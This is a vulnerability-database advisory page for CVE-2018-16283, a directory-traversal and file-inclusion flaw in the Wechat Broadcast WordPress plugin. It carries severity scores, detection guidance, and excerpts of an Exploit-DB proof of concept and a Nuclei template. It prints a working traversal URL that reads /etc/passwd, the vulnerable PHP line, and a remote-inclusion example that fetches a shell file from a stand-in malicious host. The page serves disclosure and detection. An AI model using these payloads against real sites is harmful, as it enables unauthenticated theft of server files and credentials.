CVE-2018-16283
published 2018-09-24CVE-2018-16283: The Wechat Broadcast plugin 1.2.0 and earlier for WordPress allows Directory Traversal via the Image.php url parameter.
PriorityP275critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
63.07%
99.1th percentile
The Wechat Broadcast plugin 1.2.0 and earlier for WordPress allows Directory Traversal via the Image.php url parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wechat_brodcast_project | wechat_brodcast | <= 1.2.0 | — |
Detection & IOCsextracted from sources · hover to see the quote
url/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd↗
- →Look for GET requests to Image.php with a 'url' parameter containing directory traversal sequences (../../) in the wechat-broadcast plugin path. ↗
- →The vulnerable code echoes unsanitized user input directly via file_get_contents; monitor for responses containing 'root:.*:0:0:' in the body, indicating successful /etc/passwd read. ↗
- →Also watch for Remote File Inclusion attempts where the 'url' parameter points to an external HTTP resource (e.g., http://malicious.url/shell.txt). ↗
- ·The vulnerability is unauthenticated and requires no privileges; any network-accessible WordPress instance with this plugin installed is exposed. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
exploitdb·2018-09-19·CVSS 9.8
CVE-2018-16283 [CRITICAL] WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
---
# Exploit Title: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
# Author: Manuel Garcia Cardenas
# Date: 2018-09-19
# Software link: https://es.wordpress.org/plugins/wechat-broadcast/
# CVE: CVE-2018-16283
# Description
# This bug was found in the file: /wechat-broadcast/wechat/Image.php
# echo file_get_contents(isset($_GET["url"]) ? $_GET["url"] : '');
# The parameter "url" it is not sanitized allowing include local or remote files
# To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol
# to interact with the application.
# PoC
# The following URL have been confirmed that is vulnerable to local and remote file inclusion.
GET /wordpress/wp-content/plugins/wechat-broadcast/
Nuclei
WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
nuclei·CVSS 9.8
CVE-2018-16283 [CRITICAL] WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
WordPress Wechat Broadcast plugin 1.2.0 and earlier allows Directory Traversal via the Image.php url parameter.
Template:
id: CVE-2018-16283
info:
name: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
author: 0x240x23elu
severity: critical
description: WordPress Wechat Broadcast plugin 1.2.0 and earlier allows Directory Traversal via the Image.php url parameter.
impact: |
Unauthenticated attackers can read arbitrary files on the WordPress server through directory traversal in the Image.php url parameter, potentially exposing wp-config.php containing database credentials, private keys, and other sensitive configuration files.
remediation: |
Update to the latest version of the WordPress Plugin Wechat Broadcast
http://seclists.org/fulldisclosure/2018/Sep/32https://github.com/springjk/wordpress-wechat-broadcast/issues/14https://wpvulndb.com/vulnerabilities/9132https://www.exploit-db.com/exploits/45438/https://exchange.xforce.ibmcloud.com/vulnerabilities/150202http://seclists.org/fulldisclosure/2018/Sep/32https://github.com/springjk/wordpress-wechat-broadcast/issues/14https://wpvulndb.com/vulnerabilities/9132https://www.exploit-db.com/exploits/45438/
2018-09-24
Published